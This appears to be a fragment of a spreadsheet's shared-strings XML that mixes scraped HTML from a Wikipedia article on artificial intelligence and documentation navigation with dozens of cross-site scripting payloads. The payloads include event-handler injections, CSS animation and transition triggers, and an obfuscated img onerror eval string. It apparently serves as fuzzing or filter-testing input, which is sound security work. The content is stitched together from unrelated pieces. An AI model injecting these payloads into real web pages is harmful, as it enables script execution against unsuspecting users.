    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+Economist&amp;amp;rft.atitle=Automation+and+anxiety&amp;amp;rft.date=2015-05-09&amp;amp;rft_id=https%3A%2F%2Fwww.economist.com%2Fnews%2Fspecial-report%2F21700758-will-smarter-machines-cause-mass-unemployment-automation-and-anxiety&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;ins onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/ins&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;del id=x tabindex=1 onfocus=alert(1)&gt;&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;nav onmousedown="alert(1)"&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>DATASRC=#I DATAFLD=C DATAFORMATAS=HTML</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/contracts.html"&gt;Spiders Contracts&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFSkillings2006" class="citation web"&gt;Skillings, Jonathan (3 July 2006). &lt;a rel="nofollow" class="external text" href="http://news.cnet.com/Getting-machines-to-think-like-us/2008-11394_3-6090207.html"&gt;"Getting Machines to Think Like Us" &lt;/a&gt;. &lt;i&gt;cnet &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;3 February </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Video_game" title="Video game"&gt;Video games &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			&lt;input type="submit" name="go" value="Go" title="Go to a page with this exact name if it exists" id="searchButton" class="searchButton"/&gt;</t>
  </si>
  <si>
    <t>&lt;element onmouseenter="alert(1)"&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;font oncopy="alert(1)" contenteditable&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;sup onload=alert(1)&gt;&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onkeypress="alert(1)" contenteditable&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;article onkeyup="alert(1)" contenteditable&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;marquee width=1 loop=1 onfinish=alert(1)&gt;XSS&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;button onpointerup=alert(1)&gt;XSS&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;video onpaste="alert(1)" contenteditable&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;meta name="generator" content="MediaWiki 1.35.0-wmf.22"/&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;a id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;head onpointerup=alert(1)&gt;XSS&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onpointerout=alert(1)&gt;XSS&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;picture onblur=alert(1) tabindex=1 id=x&gt;&lt;/picture&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;base oncontextmenu="alert(1)"&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;td draggable="true" ondragend="alert(1)"&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;map id=x tabindex=1 onactivate=alert(1)&gt;&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;a onmousedown="alert(1)"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;samp id=x tabindex=1 onactivate=alert(1)&gt;&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;xmp onpointerdown=alert(1)&gt;XSS&lt;/xmp&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFRussellNorvig2009"&gt;Russell &amp;amp; Norvig 2009 &lt;/a&gt;, p.&amp;#160;16. </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;rtc ondrop=alert(1) contenteditable&gt;drop here&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;ins id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onpointerleave=alert(1)&gt;XSS&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;command onmouseover="alert(1)"&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;25–26 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div class="section" id="first-steps"&gt;</t>
  </si>
  <si>
    <t>&lt;main onbeforecut="alert(1)" contenteditable&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Inference_engine" title="Inference engine"&gt;Inference engine &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Davies, Alex (5 May 2015). &lt;a rel="nofollow" class="external text" href="https://www.wired.com/2015/05/worlds-first-self-driving-semi-truck-hits-road/"&gt;"World's First Self-Driving Semi-Truck Hits the Road" &lt;/a&gt;. &lt;i&gt;WIRED &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20171028222802/https://www.wired.com/2015/05/worlds-first-self-driving-semi-truck-hits-road/"&gt;Archived &lt;/a&gt; from the original on 28 October 2017&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;20 September </t>
  </si>
  <si>
    <t>&lt;noscript id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/noscript&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;a onkeyup="alert(1)" contenteditable&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;title id=x tabindex=1 onfocus=alert(1)&gt;&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;blink onmouseleave="alert(1)"&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;col draggable="true" ondrag="alert(1)"&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>Statistical learning methods and &lt;a href="/wiki/Classifier_(mathematics)" class="mw-redirect" title="Classifier (mathematics)"&gt;classifiers &lt;/a&gt;:</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=BBC+News&amp;amp;rft.atitle=Artificial+intelligence%3A+Google%27s+AlphaGo+beats+Go+master+Lee+Se-dol&amp;amp;rft.date=2016-03-12&amp;amp;rft_id=https%3A%2F%2Fwww.bbc.com%2Fnews%2Ftechnology-35785875&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">      &lt;/li&gt;    </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFNRC1999" class="citation book"&gt;&lt;a href="/wiki/United_States_National_Research_Council" class="mw-redirect" title="United States National Research Council"&gt;NRC (United States National Research Council) &lt;/a&gt; (1999). "Developments in Artificial Intelligence". &lt;i&gt;Funding a Revolution: Government Support for Computing Research &lt;/i&gt;. National Academy Press. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=bookitem&amp;amp;rft.atitle=Developments+in+Artificial+Intelligence&amp;amp;rft.btitle=Funding+a+Revolution%3A+Government+Support+for+Computing+Research&amp;amp;rft.pub=National+Academy+Press&amp;amp;rft.date=1999&amp;amp;rft.au=NRC+%28United+States+National+Research+Council%29&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;br id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;nav id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;article id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/article&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="/en/1.1/"&gt;1.1&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>writetitle()</t>
  </si>
  <si>
    <t>&lt;hr onmouseover="alert(1)"&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onmouseout="alert(1)"&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCarthyMinskyRochesterShannon1955"&gt;McCarthy et al. 1955 &lt;/a&gt; (the original proposal) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;animatemotion onpointermove=alert(1)&gt;XSS&lt;/animatemotion&gt;</t>
  </si>
  <si>
    <t>&lt;script onkeypress="alert(1)" contenteditable&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;ul id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/ul&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt; &lt;/i&gt;&amp;#93; &lt;/sup&gt;. Other theories where AI has had impact include in &lt;a href="/wiki/Rational_choice" class="mw-redirect" title="Rational choice"&gt;rational choice &lt;/a&gt;, &lt;a href="/wiki/Rational_expectations" title="Rational expectations"&gt;rational expectations &lt;/a&gt;, &lt;a href="/wiki/Game_theory" title="Game theory"&gt;game theory &lt;/a&gt;, &lt;a href="/wiki/Lewis_turning_point" title="Lewis turning point"&gt;Lewis turning point &lt;/a&gt;, &lt;a href="/wiki/Portfolio_optimization" title="Portfolio optimization"&gt;portfolio optimization &lt;/a&gt; and &lt;a href="/wiki/Counterfactual_thinking" title="Counterfactual thinking"&gt;counterfactual thinking &lt;/a&gt;&lt;sup class="noprint Inline-Template Template-Fact" style="white-space:nowrap;"&gt;&amp;#91;&lt;i&gt;&lt;a href="/wiki/Wikipedia:Citation_needed" title="Wikipedia:Citation needed"&gt;&lt;span title="This claim needs references to reliable sources. (July 2019)"&gt;citation needed </t>
  </si>
  <si>
    <t>&lt;object onbeforecut="alert(1)" contenteditable&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Computer_architecture" title="Computer architecture"&gt;Computer architecture &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;del oncontextmenu="alert(1)"&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup draggable="true" ondragleave="alert(1)"&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;picture onclick="alert(1)"&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;map id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/map&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Deep learning often uses &lt;a href="/wiki/Convolutional_neural_network" title="Convolutional neural network"&gt;convolutional neural networks &lt;/a&gt; (CNNs), whose origins can be traced back to the &lt;a href="/wiki/Neocognitron" title="Neocognitron"&gt;Neocognitron &lt;/a&gt; introduced by &lt;a href="/wiki/Kunihiko_Fukushima" title="Kunihiko Fukushima"&gt;Kunihiko Fukushima &lt;/a&gt; in 1980.&lt;sup id="cite_ref-FUKU1980_256-0" class="reference"&gt;&lt;a href="#cite_note-FUKU1980-256"&gt;&amp;#91;245&amp;#93; &lt;/a&gt; &lt;/sup&gt; In 1989, &lt;a href="/wiki/Yann_LeCun" title="Yann LeCun"&gt;Yann LeCun &lt;/a&gt; and colleagues applied &lt;a href="/wiki/Backpropagation" title="Backpropagation"&gt;backpropagation &lt;/a&gt; to such an architecture. In the early 2000s, in an industrial application, CNNs already processed an estimated 10% to 20% of all the checks written in the US.&lt;sup id="cite_ref-lecun2016slides_257-0" class="reference"&gt;&lt;a href="#cite_note-lecun2016slides-257"&gt;&amp;#91;246&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;time draggable="true" ondrag="alert(1)"&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;main draggable="true" ondragleave="alert(1)"&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/frameset&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;isindex x="javascript:" onmouseover="alert()"&gt;</t>
  </si>
  <si>
    <t>&lt;option onpaste="alert(1)" contenteditable&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;progress onclick="alert(1)"&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;embed id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/embed&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;object onkeydown="alert(1)" contenteditable&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;nobr draggable="true" ondrag="alert(1)"&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;td oncut="alert(1)" contenteditable&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Qualia" title="Qualia"&gt;Qualia &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;bdi draggable="true" ondragend="alert(1)"&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;summary onmouseup="alert(1)"&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;audio id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Ant_colony_optimization" class="mw-redirect" title="Ant colony optimization"&gt;Ant colony optimization &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;form style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;meter style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Security_service_(telecommunication)" title="Security service (telecommunication)"&gt;Security services &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      &lt;span class="fa fa-book"&gt; Read the Docs</t>
  </si>
  <si>
    <t>&lt;nav onpaste="alert(1)" contenteditable&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;input onauxclick=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; 2014 </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;button style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/button&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">This is a central idea of &lt;a href="/wiki/Pamela_McCorduck" title="Pamela McCorduck"&gt;Pamela McCorduck &lt;/a&gt;'s &lt;i&gt;Machines Who Think &lt;/i&gt;. She writes: "I like to think of artificial intelligence as the scientific apotheosis of a venerable cultural tradition." (&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, p.&amp;#160;34) "Artificial intelligence in one form or another is an idea that has pervaded Western intellectual history, a dream in urgent need of being realized." (&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, p.&amp;#160;xviii) "Our history is full of attempts—nutty, eerie, comical, earnest, legendary and real—to make artificial intelligences, to reproduce what is the essential us—bypassing the ordinary means. Back and forth between myth and reality, our imaginations supplying what our workshops couldn't, we have engaged for a long time in this odd form of self-reproduction." (&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, p.&amp;#160;3) She traces the desire back to its &lt;a href="/wiki/Hellenistic" class="mw-redirect" title="Hellenistic"&gt;Hellenistic &lt;/a&gt; roots and calls it the urge to "forge the Gods." (&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;340–400) </t>
  </si>
  <si>
    <t>http://1113982867/</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-50"&gt;&lt;a href="#Potential_harm"&gt;&lt;span class="tocnumber"&gt;8.2 </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="thumbinner" style="width:222px;"&gt;&lt;a href="/wiki/File:GFO_taxonomy_tree.png" class="image"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/9/9e/GFO_taxonomy_tree.png/220px-GFO_taxonomy_tree.png" decoding="async" width="220" height="208" class="thumbimage" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/9/9e/GFO_taxonomy_tree.png/330px-GFO_taxonomy_tree.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/9/9e/GFO_taxonomy_tree.png/440px-GFO_taxonomy_tree.png 2x" data-file-width="469" data-file-height="443" /&gt; &lt;/a&gt;  &lt;div class="thumbcaption"&gt;</t>
  </si>
  <si>
    <t>&lt;meta onbeforecopy="alert(1)" contenteditable&gt;test&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;dfn style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>Formal reasoning:</t>
  </si>
  <si>
    <t>&lt;nobr onblur=alert(1) tabindex=1 id=x&gt;&lt;/nobr&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup ondblclick="alert(1)"&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Stuart_Umpleby" title="Stuart Umpleby"&gt;Stuart Umpleby &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;output oncopy="alert(1)" contenteditable&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      &lt;div class="wy-side-scroll"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Science+%7C+AAAS&amp;amp;rft.atitle=The+AI+revolution+in+science&amp;amp;rft.date=2017-07-05&amp;amp;rft_id=http%3A%2F%2Fwww.sciencemag.org%2Fnews%2F2017%2F07%2Fai-revolution-science&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;dt oncontextmenu="alert(1)"&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;dfn id=x tabindex=1 onactivate=alert(1)&gt;&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;font onkeydown="alert(1)" contenteditable&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Learning algorithms work on the basis that strategies, algorithms, and inferences that worked well in the past are likely to continue working well in the future. These inferences can be obvious, such as "since the sun rose every morning for the last 10,000 days, it will probably rise tomorrow morning as well". They can be nuanced, such as "X% of &lt;a href="/wiki/Family_(biology)" title="Family (biology)"&gt;families &lt;/a&gt; have geographically separate species with color variants, so there is a Y% chance that undiscovered &lt;a href="/wiki/Black_swan_theory" title="Black swan theory"&gt;black swans &lt;/a&gt; exist". Learners also work on the basis of "&lt;a href="/wiki/Occam%27s_razor#Probability_theory_and_statistics" title="Occam&amp;#39;s razor"&gt;Occam's razor &lt;/a&gt;": The simplest theory that explains the data is the likeliest. Therefore, according to Occam's razor principle, a learner must be designed such that it prefers simpler theories to complex theories, except in cases where the complex theory is proven substantially better.</t>
  </si>
  <si>
    <t>&lt;thead id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;hr onbeforepaste="alert(1)" contenteditable&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;blink draggable="true" ondragend="alert(1)"&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;time draggable="true" ondragleave="alert(1)"&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+Economist&amp;amp;rft.atitle=Google+leads+in+the+race+to+dominate+artificial+intelligence&amp;amp;rft.date=2017&amp;amp;rft_id=https%3A%2F%2Fwww.economist.com%2Fnews%2Fbusiness%2F21732125-tech-giants-are-investing-billions-transformative-technology-google-leads-race&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;dd&gt;&lt;a href="/wiki/G%C3%B6del" class="mw-redirect" title="Gödel"&gt;Gödel &lt;/a&gt; himself,&lt;sup id="cite_ref-Gödel_himself_356-0" class="reference"&gt;&lt;a href="#cite_note-Gödel_himself-356"&gt;&amp;#91;345&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/John_Lucas_(philosopher)" title="John Lucas (philosopher)"&gt;John Lucas &lt;/a&gt; (in 1961) and &lt;a href="/wiki/Roger_Penrose" title="Roger Penrose"&gt;Roger Penrose &lt;/a&gt; (in a more detailed argument from 1989 onwards) made highly technical arguments that human mathematicians can consistently see the truth of their own "Gödel statements" and therefore have computational abilities beyond that of mechanical Turing machines.&lt;sup id="cite_ref-The_mathematical_objection_357-0" class="reference"&gt;&lt;a href="#cite_note-The_mathematical_objection-357"&gt;&amp;#91;346&amp;#93; &lt;/a&gt; &lt;/sup&gt; However, some people do not agree with the "Gödelian arguments".&lt;sup id="cite_ref-358" class="reference"&gt;&lt;a href="#cite_note-358"&gt;&amp;#91;347&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-359" class="reference"&gt;&lt;a href="#cite_note-359"&gt;&amp;#91;348&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-360" class="reference"&gt;&lt;a href="#cite_note-360"&gt;&amp;#91;349&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;/dd&gt; &lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;table oncut="alert(1)" contenteditable&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;footer onclick="alert(1)"&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Stochastic_methods_for_uncertain_reasoning-204"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Stochastic_methods_for_uncertain_reasoning_204-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/Begriffsschrift" title="Begriffsschrift"&gt;Begriffsschrift &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;canvas onpointerdown=alert(1)&gt;XSS&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;ruby style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/ruby&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div role="note" class="hatnote navigation-not-searchable"&gt;"AI" redirects here. For other uses, see &lt;a href="/wiki/AI_(disambiguation)" class="mw-redirect mw-disambig" title="AI (disambiguation)"&gt;AI (disambiguation) &lt;/a&gt; and &lt;a href="/wiki/Artificial_intelligence_(disambiguation)" class="mw-disambig" title="Artificial intelligence (disambiguation)"&gt;Artificial intelligence (disambiguation) &lt;/a&gt;. &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onblur=alert(1) tabindex=1 id=x&gt;&lt;/keygen&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;col onbeforecopy="alert(1)" contenteditable&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;frame onblur=alert(1) tabindex=1 id=x&gt;&lt;/frame&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;div class="version"&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onmouseenter="alert(1)"&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;McFarland, Matt. "Google's artificial intelligence breakthrough may have a huge impact on self-driving cars and much more". &lt;i&gt;The Washington Post &lt;/i&gt; 25 February 2015. Infotrac Newsstand. 24 October 2016 </t>
  </si>
  <si>
    <t>&lt;p&gt;Researchers at &lt;a href="/wiki/MIT" class="mw-redirect" title="MIT"&gt;MIT &lt;/a&gt; (such as &lt;a href="/wiki/Marvin_Minsky" title="Marvin Minsky"&gt;Marvin Minsky &lt;/a&gt; and &lt;a href="/wiki/Seymour_Papert" title="Seymour Papert"&gt;Seymour Papert &lt;/a&gt;)&lt;sup id="cite_ref-AI_at_MIT_in_the_60s_163-0" class="reference"&gt;&lt;a href="#cite_note-AI_at_MIT_in_the_60s-163"&gt;&amp;#91;160&amp;#93; &lt;/a&gt; &lt;/sup&gt; found that solving difficult problems in &lt;a href="/wiki/Computer_vision" title="Computer vision"&gt;vision &lt;/a&gt; and &lt;a href="/wiki/Natural_language_processing" title="Natural language processing"&gt;natural language processing &lt;/a&gt; required ad-hoc solutions—they argued that there was no simple and general principle (like &lt;a href="/wiki/Logic" title="Logic"&gt;logic &lt;/a&gt;) that would capture all the aspects of intelligent behavior. &lt;a href="/wiki/Roger_Schank" title="Roger Schank"&gt;Roger Schank &lt;/a&gt; described their "anti-logic" approaches as "&lt;a href="/wiki/Neats_vs._scruffies" class="mw-redirect" title="Neats vs. scruffies"&gt;scruffy &lt;/a&gt;" (as opposed to the "&lt;a href="/wiki/Neats_vs._scruffies" class="mw-redirect" title="Neats vs. scruffies"&gt;neat &lt;/a&gt;" paradigms at &lt;a href="/wiki/Carnegie_Mellon_University" title="Carnegie Mellon University"&gt;CMU &lt;/a&gt; and Stanford).&lt;sup id="cite_ref-Neats_vs._scruffies_17-2" class="reference"&gt;&lt;a href="#cite_note-Neats_vs._scruffies-17"&gt;&amp;#91;17&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Commonsense_knowledge_bases" class="mw-redirect" title="Commonsense knowledge bases"&gt;Commonsense knowledge bases &lt;/a&gt; (such as &lt;a href="/wiki/Doug_Lenat" class="mw-redirect" title="Doug Lenat"&gt;Doug Lenat &lt;/a&gt;'s &lt;a href="/wiki/Cyc" title="Cyc"&gt;Cyc &lt;/a&gt;) are an example of "scruffy" AI, since they must be built by hand, one complicated concept at a time.&lt;sup id="cite_ref-Cyc_164-0" class="reference"&gt;&lt;a href="#cite_note-Cyc-164"&gt;&amp;#91;161&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;/script&gt;&lt;img/*%00/src="worksinchrome&amp;colon;prompt(1)"/%00*/onerror='eval(src)'&gt;</t>
  </si>
  <si>
    <t>AI becomes hugely successful in the early 21st century</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Middleware" title="Middleware"&gt;Middleware &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;form onmouseout="alert(1)"&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Programmable_metallization_cell" title="Programmable metallization cell"&gt;CBRAM &lt;/a&gt; &lt;/li&gt;</t>
